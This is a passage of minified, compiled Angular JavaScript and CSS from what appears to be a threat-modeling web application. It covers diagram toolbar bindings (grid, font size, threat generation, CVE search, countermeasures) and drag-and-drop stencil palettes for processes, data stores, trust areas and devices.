n=Ti(33),r=Ti(89),c=Ti(267),d=Ti(296),T=Ti(354);C(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),C(2),Ct("toolBtn-Selected","mouse"==i.Dia.MouseMode),at("matTooltip",re(5,119,"pages.modeling.diagram.mouse")),C(7),Ct("toolBtn-Selected","pan"==i.Dia.MouseMode),at("matTooltip",re(12,121,"pages.modeling.diagram.pan")),C(7),Ct("toolBtn-Selected","move"==i.Dia.MouseMode),at("matTooltip",re(19,123,"pages.modeling.diagram.move")),V("disabled",!0),C(7),at("matTooltip",re(26,125,"pages.modeling.diagram.grid")),V("matMenuTriggerFor",n),C(12),V("ngModel",i.Dia.ShowGrid),C(1),ct("\n          ",re(39,127,"pages.modeling.diagram.showGrid"),"\n        "),C(6),V("disabled",!i.Dia.ShowGrid)("ngModel",i.Dia.StickToGrid),C(1),ct("\n          ",re(46,129,"pages.modeling.diagram.stickToGrid"),"\n        "),C(5),at("matTooltip",re(51,131,8==i.Dia.AnchorCount?"pages.modeling.diagram.anchorCount8":"pages.modeling.diagram.anchorCount4")),V("disabled",!i.Dia.CanSetAnchorCount),C(5),V("ngIf",8==i.Dia.AnchorCount),C(2),V("ngIf",8==i.Dia.AnchorCount),C(2),V("ngIf",8==i.Dia.AnchorCount),C(2),V("ngIf",8==i.Dia.AnchorCount),C(2),Rt("fill",i.GetIconColor(i.Dia.CanSetAnchorCount)),C(2),Rt("fill",i.GetIconColor(i.Dia.CanSetAnchorCount)),C(2),Rt("fill",i.GetIconColor(i.Dia.CanSetAnchorCount)),C(2),Rt("fill",i.GetIconColor(i.Dia.CanSetAnchorCount)),C(4),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),at("matTooltip",re(82,133,"pages.modeling.diagram.textFormatSize")),V("matMenuTriggerFor",r),C(14),V("checked",1==i.Dia.FontSizeConfigIndex),C(1),ke(re(97,135,"pages.modeling.diagram.fs.textSmaller")),C(9),V("checked",2==i.Dia.FontSizeConfigIndex),C(1),ke(re(107,137,"pages.modeling.diagram.fs.textSmall")),C(9),V("checked",3==i.Dia.FontSizeConfigIndex),C(1),ke(re(117,139,"pages.modeling.diagram.fs.textNormal")),C(9),V("checked",4==i.Dia.FontSizeConfigIndex),C(1),ke(re(127,141,"pages.modeling.diagram.fs.textLarge")),C(9),V("checked",5==i.Dia.FontSizeConfigIndex),C(1),ke(re(137,143,"pages.modeling.diagram.fs.textLarger")),C(6),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),at("matTooltip",re(147,145,"pages.modeling.diagram.sendBack")),V("disabled",!i.Dia.IsObjectSelected),C(5),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected)),C(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(2),Rt("fill",i.theme.Color2),C(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(2),Rt("fill",i.theme.Color2),C(4),at("matTooltip",re(164,147,"pages.modeling.diagram.sendBackwards")),V("disabled",!i.Dia.IsObjectSelected),C(5),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected)),C(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(2),Rt("fill",i.theme.Color2),C(4),at("matTooltip",re(177,149,"pages.modeling.diagram.bringForward")),V("disabled",!i.Dia.IsObjectSelected),C(5),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(2),Rt("fill",i.theme.Color2),C(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(4),at("matTooltip",re(190,151,"pages.modeling.diagram.bringFront")),V("disabled",!i.Dia.IsObjectSelected),C(5),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(2),Rt("fill",i.theme.Color2),C(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(2),Rt("fill",i.theme.Color2),C(2),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.Color2),C(4),at("matTooltip",re(207,153,"pages.modeling.diagram.annotation")),V("disabled","pan"==i.Dia.MouseMode),C(8),at("matTooltip",re(215,155,"pages.modeling.diagram.findUninitObject")),V("disabled",0==i.Dia.ObjectCountToInit.length),C(3),V("matBadge",i.Dia.ObjectCountToInit)("matBadgeHidden",0==i.Dia.ObjectCountToInit.length),C(4),at("matTooltip",re(222,157,"pages.modeling.diagram.suggestedThreats")),V("disabled",i.IsContextDiagram||!i.selectedElement),C(7),at("matTooltip",re(229,159,"pages.modeling.diagram.addAttackScenario")),V("disabled",!i.selectedElement),C(7),at("matTooltip",re(236,161,"pages.modeling.diagram.CveSearch")),V("disabled",!i.selectedElement),C(6),Rt("fill",i.GetIconColor(i.Dia.IsObjectSelected)),C(2),Rt("fill",i.theme.IsDarkMode?"#000":"#FFF"),C(5),V("ngIf",i.dataService.Project.HasTesting),C(2),at("matTooltip",re(251,163,"pages.modeling.diagram.addCountermeasure")),V("disabled",!i.selectedElement),C(7),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),at("matTooltip",re(260,165,"pages.modeling.diagram.ThreatGenerationSettings")),V("matMenuTriggerFor",c),C(12),V("ngModel",i.diagram.Settings.GenerationThreatLibrary),C(1),ct("\n          ",re(273,167,"pages.modeling.diagram.ThreatLibrary"),"\n        "),C(4),V("ngIf",i.HasMnemonics),C(2),V("disabled",!i.HasThreatRuleGroups)("matMenuTriggerFor",d),C(1),ke(re(280,169,"pages.modeling.diagram.ThreatRuleGroups")),C(5),V("ngModel",i.diagram.Settings.GenerationAssetBased),C(1),ct("\n          ",re(286,171,"pages.modeling.diagram.AssetBasedGeneration"),"\n        "),C(7),V("ngForOf",i.dataService.Config.GetStencilThreatMnemonics()),C(6),V("ngForOf",i.GetThreatRuleGroups()),C(5),V("value",i.Zoom),C(30),V("ngIf",!kr(175,glt).includes(i.Zoom)),C(3),at("matTooltip",re(337,173,"pages.modeling.diagram.fitSceen")),C(14),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",T)}},dependencies:[Zi,Ri,pm,_m,Ta,Ea,tH,NMe,oa,Hh,da,pp,Xo,qo,po,el,Pa,Mg,sV,cV,bP,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:100%}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.my-canvas[_ngcontent-%COMP%]{height:calc(100% - 32px)}",".heavy[_ngcontent-%COMP%] {\n          font: bold 10px sans-serif;\n        }"]}),t})();function ylt(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n        "),m(10,"mat-panel-description"),s(11,"\n          "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n        "),u(),s(15,"\n      "),u(),s(16),oe(17,"translate"),u(),s(18,"\n  "),Mt()),2&t&&(C(7),ct("\n          ",re(8,2,"general.Info"),"\n        "),C(9),ct("\n      \n      ",re(17,4,"pages.modeling.stencilpalettte.cs.info"),"\n    "))}function blt(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n        "),m(10,"mat-panel-description"),s(11,"\n          "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n        "),u(),s(15,"\n      "),u(),s(16),oe(17,"translate"),u(),s(18,"\n  "),Mt()),2&t&&(C(7),ct("\n          ",re(8,2,"general.Info"),"\n        "),C(9),ct("\n  \n      ",re(17,4,"pages.modeling.stencilpalettte.oi.info"),"\n    "))}function Mlt(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n        "),m(10,"mat-panel-description"),s(11,"\n          "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n        "),u(),s(15,"\n      "),u(),s(16),oe(17,"translate"),u(),s(18,"\n  "),Mt()),2&t&&(C(7),ct("\n          ",re(8,2,"general.Info"),"\n        "),C(9),ct("\n  \n      ",re(17,4,"pages.modeling.stencilpalettte.uc.infoNoReferences"),"\n    "))}function vlt(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n        "),m(10,"mat-panel-description"),s(11,"\n          "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n        "),u(),s(15,"\n      "),u(),s(16),oe(17,"translate"),u(),s(18,"\n  "),Mt()),2&t&&(C(7),ct("\n          ",re(8,2,"general.Info"),"\n        "),C(9),ct("\n  \n      ",re(17,4,"pages.modeling.stencilpalettte.dt.info"),"\n    "))}function Alt(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n        "),m(10,"mat-panel-description"),s(11,"\n          "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n        "),u(),s(15,"\n      "),u(),s(16),oe(17,"translate"),u(),s(18,"\n  "),Mt()),2&t&&(C(7),ct("\n          ",re(8,2,"general.Info"),"\n        "),C(9),ct("\n  \n      ",re(17,4,"pages.modeling.stencilpalettte.a.info"),"\n    "))}function Tlt(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n        "),m(10,"mat-panel-description"),s(11,"\n          "),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n        "),u(),s(15,"\n      "),u(),s(16),oe(17,"translate"),u(),s(18,"\n  "),Mt()),2&t&&(C(7),ct("\n          ",re(8,2,"general.Info"),"\n        "),C(9),ct("\n  \n      ",re(17,4,"pages.modeling.stencilpalettte.swp.info"),"\n    "))}function Elt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDrag(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),m(1,"div",7),s(2),u()()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetStencilRefToolTip(e)),C(1),ri("border-color",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),C(1),ke(e.name)}}function Dlt(t,a){if(1&t&&(fi(),m(0,"tspan",14),s(1),u()),2&t){const e=B().$implicit,i=B(2);ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,1))}}function xlt(t,a){if(1&t&&(fi(),m(0,"tspan",15),s(1),u()),2&t){const e=B().$implicit,i=B(2);ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,2))}}function wlt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDrag(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),s(1,"\n          "),fi(),m(2,"svg",8),s(3,"\n            "),it(4,"path",9),s(5,"\n            "),m(6,"text",10),s(7,"\n              "),m(8,"tspan",11),s(9),u(),s(10,"\n              "),ne(11,Dlt,2,3,"tspan",12),s(12,"\n              "),ne(13,xlt,2,3,"tspan",13),s(14,"\n            "),u(),s(15,"\n          "),u(),s(16,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetStencilRefToolTip(e)),C(4),ri("stroke",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),C(4),ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,0)),C(2),V("ngIf",i.WrapSVGText(null==e?null:e.name,1)),C(2),V("ngIf",i.WrapSVGText(null==e?null:e.name,2))}}function Ilt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(3).onDrag(n,c))})("dragend",function(){return be(e),Me(B(3).onDragEnd())}),m(1,"div",16),s(2),u()()}if(2&t){const e=a.$implicit,i=B(3);at("matTooltip",i.GetStencilRefToolTip(e)),C(1),ri("border-color",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),C(1),ke(e.name)}}function Rlt(t,a){if(1&t&&(m(0,"mat-expansion-panel",2),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5,"\n          External Entity\n        "),u(),s(6,"\n        "),m(7,"mat-panel-description"),s(8,"\n          "),m(9,"mat-icon"),s(10,"cloud"),u(),s(11,"\n        "),u(),s(12,"\n      "),u(),s(13,"\n\n      "),m(14,"div",3),s(15,"\n        "),ne(16,Ilt,3,4,"div",4),s(17,"\n      "),u(),s(18,"\n    "),u()),2&t){const e=B(2);C(16),V("ngForOf",e.ExternalEntityStencils)}}function Slt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDrag(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),m(1,"div",17),s(2),u()()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetStencilRefToolTip(e)),C(1),ri("border-color",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),C(1),ke(e.name)}}function klt(t,a){if(1&t&&(fi(),m(0,"tspan",14),s(1),u()),2&t){const e=B().$implicit,i=B(3);ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,1))}}function Plt(t,a){if(1&t&&(fi(),m(0,"tspan",15),s(1),u()),2&t){const e=B().$implicit,i=B(3);ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,2))}}function Olt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(3).onDrag(n,c))})("dragend",function(){return be(e),Me(B(3).onDragEnd())}),s(1,"\n          "),fi(),m(2,"svg",8),s(3,"\n            "),it(4,"path",18),s(5,"\n            "),m(6,"text",10),s(7,"\n              "),m(8,"tspan",11),s(9),u(),s(10,"\n              "),ne(11,klt,2,3,"tspan",12),s(12,"\n              "),ne(13,Plt,2,3,"tspan",13),s(14,"\n            "),u(),s(15,"\n          "),u(),s(16,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(3);at("matTooltip",i.GetStencilRefToolTip(e)),C(4),ri("stroke",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),C(4),ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,0)),C(2),V("ngIf",i.WrapSVGText(null==e?null:e.name,1)),C(2),V("ngIf",i.WrapSVGText(null==e?null:e.name,2))}}function Nlt(t,a){if(1&t&&(m(0,"mat-expansion-panel",2),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5,"\n          Interface\n        "),u(),s(6,"\n        "),m(7,"mat-panel-description"),s(8,"\n          "),m(9,"mat-icon"),s(10,"sync_alt"),u(),s(11,"\n        "),u(),s(12,"\n      "),u(),s(13,"\n\n      "),s(14,"\n      "),m(15,"div",3),s(16,"\n        "),ne(17,Olt,17,8,"div",4),s(18,"\n      "),u(),s(19,"\n    "),u()),2&t){const e=B(2);C(17),V("ngForOf",e.InterfaceStencils)}}function Llt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(3).onDrag(n,c))})("dragend",function(){return be(e),Me(B(3).onDragEnd())}),m(1,"div",7),s(2),u()()}if(2&t){const e=a.$implicit,i=B(3);at("matTooltip",i.GetStencilRefToolTip(e)),C(1),ri("border-color",i.theme.Accent),C(1),ke(e.name)}}function zlt(t,a){if(1&t&&(m(0,"mat-expansion-panel",2),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5,"\n          Interface\n        "),u(),s(6,"\n        "),m(7,"mat-panel-description"),s(8,"\n          "),m(9,"mat-icon"),s(10,"sync_alt"),u(),s(11,"\n        "),u(),s(12,"\n      "),u(),s(13,"\n\n      "),m(14,"div",3),s(15,"\n        "),ne(16,Llt,3,4,"div",4),s(17,"\n      "),u(),s(18,"\n    "),u()),2&t){const e=B(2);C(16),V("ngForOf",e.InterfaceStencils)}}function Wlt(t,a){if(1&t&&(fi(),m(0,"tspan",14),s(1),u()),2&t){const e=B().$implicit,i=B(2);ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,1))}}function Flt(t,a){if(1&t&&(fi(),m(0,"tspan",15),s(1),u()),2&t){const e=B().$implicit,i=B(2);ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,2))}}function Vlt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDrag(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),s(1,"\n          "),fi(),m(2,"svg",8),s(3,"\n            "),it(4,"path",19),s(5,"\n            "),m(6,"text",10),s(7,"\n              "),m(8,"tspan",11),s(9),u(),s(10,"\n              "),ne(11,Wlt,2,3,"tspan",12),s(12,"\n              "),ne(13,Flt,2,3,"tspan",13),s(14,"\n            "),u(),s(15,"\n          "),u(),s(16,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetStencilRefToolTip(e)),C(4),ri("stroke",e.elementID?i.theme.Primary:e.templateID?i.theme.Accent:i.StrokeColor),C(4),ri("fill",i.StrokeColor),C(1),ke(i.WrapSVGText(null==e?null:e.name,0)),C(2),V("ngIf",i.WrapSVGText(null==e?null:e.name,1)),C(2),V("ngIf",i.WrapSVGText(null==e?null:e.name,2))}}function Blt(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDrag(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),m(1,"div",7),s(2),u()()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetStencilRefToolTip(e)),C(1),ri("border-color",i.theme.Accent),C(1),ke(e.name)}}function Hlt(t,a){if(1&t&&(bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7,"\n          Process\n        "),u(),s(8,"\n        "),m(9,"mat-panel-description"),s(10,"\n          "),m(11,"mat-icon"),s(12,"memory"),u(),s(13,"\n        "),u(),s(14,"\n      "),u(),s(15,"\n\n      "),m(16,"div",3),s(17,"\n        "),ne(18,Elt,3,4,"div",4),s(19,"\n      "),u(),s(20,"\n    "),u(),s(21,"\n\n    "),m(22,"mat-expansion-panel",2),s(23,"\n      "),m(24,"mat-expansion-panel-header"),s(25,"\n        "),m(26,"mat-panel-title"),s(27,"\n          Data Store\n        "),u(),s(28,"\n        "),m(29,"mat-panel-description"),s(30,"\n          "),m(31,"mat-icon"),s(32,"sd_card"),u(),s(33,"\n        "),u(),s(34,"\n      "),u(),s(35,"\n\n      "),m(36,"div",3),s(37,"\n        "),ne(38,wlt,17,8,"div",4),s(39,"\n      "),u(),s(40,"\n    "),u(),s(41,"\n\n    "),ne(42,Rlt,19,1,"mat-expansion-panel",5),s(43,"\n    "),s(44,"\n    "),m(45,"mat-expansion-panel",2),s(46,"\n      "),m(47,"mat-expansion-panel-header"),s(48,"\n        "),m(49,"mat-panel-title"),s(50,"\n          Trust Area\n        "),u(),s(51,"\n        "),m(52,"mat-panel-description"),s(53,"\n          "),m(54,"mat-icon"),s(55,"select_all"),u(),s(56,"\n        "),u(),s(57,"\n      "),u(),s(58,"\n\n      "),m(59,"div",3),s(60,"\n        "),ne(61,Slt,3,4,"div",4),s(62,"\n      "),u(),s(63,"\n    "),u(),s(64,"\n\n    "),ne(65,Nlt,20,1,"mat-expansion-panel",5),s(66,"\n    "),ne(67,zlt,19,1,"mat-expansion-panel",5),s(68,"\n\n    "),m(69,"mat-expansion-panel",2),s(70,"\n      "),m(71,"mat-expansion-panel-header"),s(72,"\n        "),m(73,"mat-panel-title"),s(74,"\n          Physical Link\n        "),u(),s(75,"\n        "),m(76,"mat-panel-description"),s(77,"\n          "),m(78,"mat-icon"),s(79,"precision_manufacturing"),u(),s(80,"\n        "),u(),s(81,"\n      "),u(),s(82,"\n\n      "),s(83,"\n      "),m(84,"div",3),s(85,"\n        "),ne(86,Vlt,17,8,"div",4),s(87,"\n      "),u(),s(88,"\n    "),u(),s(89,"\n\n    "),m(90,"mat-expansion-panel",2),s(91,"\n      "),m(92,"mat-expansion-panel-header"),s(93,"\n        "),m(94,"mat-panel-title"),s(95,"\n          Template\n        "),u(),s(96,"\n        "),m(97,"mat-panel-description"),s(98,"\n          "),m(99,"mat-icon"),s(100,"view_module"),u(),s(101,"\n        "),u(),s(102,"\n      "),u(),s(103,"\n\n      "),m(104,"div",3),s(105,"\n        "),ne(106,Blt,3,4,"div",4),s(107,"\n      "),u(),s(108,"\n    "),u(),s(109,"\n  "),Mt()),2&t){const e=B();C(18),V("ngForOf",e.ProcessStencils),C(20),V("ngForOf",e.DataStoreStencils),C(4),V("ngIf","dataflow"==e.NodeType),C(19),V("ngForOf",e.TrustAreaStencils),C(4),V("ngIf","hardware"==e.NodeType),C(2),V("ngIf","dataflow"==e.NodeType),C(19),V("ngForOf",e.PhysicalLinkStencils),C(20),V("ngForOf",e.StencilTemplates)}}function Ult(t,a){if(1&t){const e=Ye();m(0,"div",6),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDragComponent(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),m(1,"div",7),s(2),u()()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(2),ke(e.Name)}}function qlt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7,"\n          Component\n        "),u(),s(8,"\n        "),m(9,"mat-panel-description"),s(10,"\n          "),m(11,"mat-icon"),s(12,"code"),u(),s(13,"\n        "),u(),s(14,"\n      "),u(),s(15,"\n\n      "),m(16,"div",3),s(17,"\n        "),m(18,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragComponent(n))})("dragend",function(){return be(e),Me(B().onDragEnd())}),m(19,"div",7),s(20,"New Component"),u()(),s(21,"\n        "),ne(22,Ult,3,2,"div",21),s(23,"\n      "),u(),s(24,"\n\n    "),u(),s(25,"\n  "),Mt()}if(2&t){const e=B();C(22),V("ngForOf",e.ComponentTypes)}}function Glt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7,"\n          Device\n        "),u(),s(8,"\n        "),m(9,"mat-panel-description"),s(10,"\n          "),m(11,"mat-icon"),s(12,"developer_board"),u(),s(13,"\n        "),u(),s(14,"\n      "),u(),s(15,"\n  \n      "),m(16,"div",3),s(17,"\n        "),m(18,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Device",type:"1"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(19,"\n          "),m(20,"div",16),s(21,"Device"),u(),s(22,"\n        "),u(),s(23,"\n        "),m(24,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Device",type:"2"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(25,"\n          "),m(26,"div",16),s(27,"\n            "),m(28,"div",22),s(29,"Device"),u(),s(30,"\n          "),u(),s(31,"\n        "),u(),s(32,"\n      "),u(),s(33,"\n    "),u(),s(34,"\n\n    "),m(35,"mat-expansion-panel",2),s(36,"\n      "),m(37,"mat-expansion-panel-header"),s(38,"\n        "),m(39,"mat-panel-title"),s(40,"\n          App\n        "),u(),s(41,"\n        "),m(42,"mat-panel-description"),s(43,"\n          "),m(44,"mat-icon"),s(45,"widgets"),u(),s(46,"\n        "),u(),s(47,"\n      "),u(),s(48,"\n  \n      "),m(49,"div",3),s(50,"\n        "),m(51,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"App",type:"1"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(52,"\n          "),m(53,"div",16),s(54,"App"),u(),s(55,"\n        "),u(),s(56,"\n        "),m(57,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"App",type:"2"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(58,"\n          "),m(59,"div",16),s(60,"\n            "),m(61,"div",22),s(62,"App"),u(),s(63,"\n          "),u(),s(64,"\n        "),u(),s(65,"\n      "),u(),s(66,"\n    "),u(),s(67,"\n\n    "),m(68,"mat-expansion-panel",2),s(69,"\n      "),m(70,"mat-expansion-panel-header"),s(71,"\n        "),m(72,"mat-panel-title"),s(73,"\n          Actor\n        "),u(),s(74,"\n        "),m(75,"mat-panel-description"),s(76,"\n          "),m(77,"mat-icon"),s(78,"people"),u(),s(79,"\n        "),u(),s(80,"\n      "),u(),s(81,"\n  \n      "),m(82,"div",3),s(83,"\n        "),m(84,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Interactor"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(85,"\n          "),fi(),m(86,"svg",8),s(87,"\n            "),it(88,"circle",23),s(89,"\n            "),it(90,"path",24),s(91,"\n            "),m(92,"text",10),s(93,"\n              "),m(94,"tspan",25),s(95,"Actor"),u(),s(96,"\n            "),u(),s(97,"\n          